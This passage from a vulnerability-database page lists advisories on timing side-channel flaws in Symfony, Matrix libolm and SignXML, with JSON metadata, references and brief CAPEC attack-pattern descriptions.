      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2015-8125.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2015-8125.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2015-8125.yaml"
    },
    {
      "type": "WEB",
      "url": "https://symfony.com/blog/cve-2015-8125-potential-remote-timing-attack-vulnerability-in-security-remember-me-service"
    },
    {
      "type": "WEB",
      "url": "https://symfony.com/cve-2015-8125"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20200228050051/http://www.securityfocus.com/bid/77692"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-December/173271.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-December/173300.html"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2015/dsa-3402"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/77692"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Symfony Vulnerable to Timing Attack"
}

GHSA-GC66-2JQ6-66C6

Vulnerability from github – Published: 2024-08-22 18:31 – Updated: 2024-08-23 00:31
VLAI
Details

An issue was discovered in Matrix libolm (aka Olm) through 3.2.16. The AES implementation is vulnerable to cache-timing attacks due to use of S-boxes. This is related to software that uses a lookup table for the SubWord step. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-45191"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-22T16:15:10Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in Matrix libolm (aka Olm) through 3.2.16. The AES implementation is vulnerable to cache-timing attacks due to use of S-boxes. This is related to software that uses a lookup table for the SubWord step. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.",
  "id": "GHSA-gc66-2jq6-66c6",
  "modified": "2024-08-23T00:31:39Z",
  "published": "2024-08-22T18:31:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45191"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.matrix.org/matrix-org/olm"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.matrix.org/matrix-org/olm/-/commit/6d4b5b07887821a95b144091c8497d09d377f985"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=41249371"
    },
    {
      "type": "WEB",
      "url": "https://soatok.blog/2024/08/14/security-issues-in-matrixs-olm-library"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GMHF-GG8W-JW42

Vulnerability from github – Published: 2025-06-05 00:37 – Updated: 2025-06-05 00:37
VLAI
Summary
SignXML's signature verification with HMAC is vulnerable to a timing attack
Details

When verifying signatures with X509 certificate validation turned off and HMAC shared secret set (signxml.XMLVerifier.verify(require_x509=False, hmac_key=...), prior versions of SignXML are vulnerable to a potential timing attack. The verifier may leak information about the correct HMAC when comparing it with the user supplied hash, allowing users to reconstruct the correct HMAC for any data.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "signxml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48995"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-05T00:37:19Z",
    "nvd_published_at": "2025-06-02T17:15:41Z",
    "severity": "MODERATE"
  },
  "details": "When verifying signatures with X509 certificate validation turned off and HMAC shared secret set (`signxml.XMLVerifier.verify(require_x509=False, hmac_key=...`), prior versions of SignXML are vulnerable to a potential timing attack. The verifier may leak information about the correct HMAC when comparing it with the user supplied hash, allowing users to reconstruct the correct HMAC for any data.",
  "id": "GHSA-gmhf-gg8w-jw42",
  "modified": "2025-06-05T00:37:19Z",
  "published": "2025-06-05T00:37:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/XML-Security/signxml/security/advisories/GHSA-gmhf-gg8w-jw42"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48995"
    },
    {
      "type": "WEB",
      "url": "https://github.com/XML-Security/signxml/commit/1b501faaacf34cf978a52dbc6915ec11e27611cd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/XML-Security/signxml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SignXML\u0027s signature verification with HMAC is vulnerable to a timing attack"
}

No mitigation information available for this CWE.

CAPEC-462: Cross-Domain Search Timing

An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain.

CAPEC-541: Application Fingerprinting

An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.

CAPEC-580: System Footprinting

An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.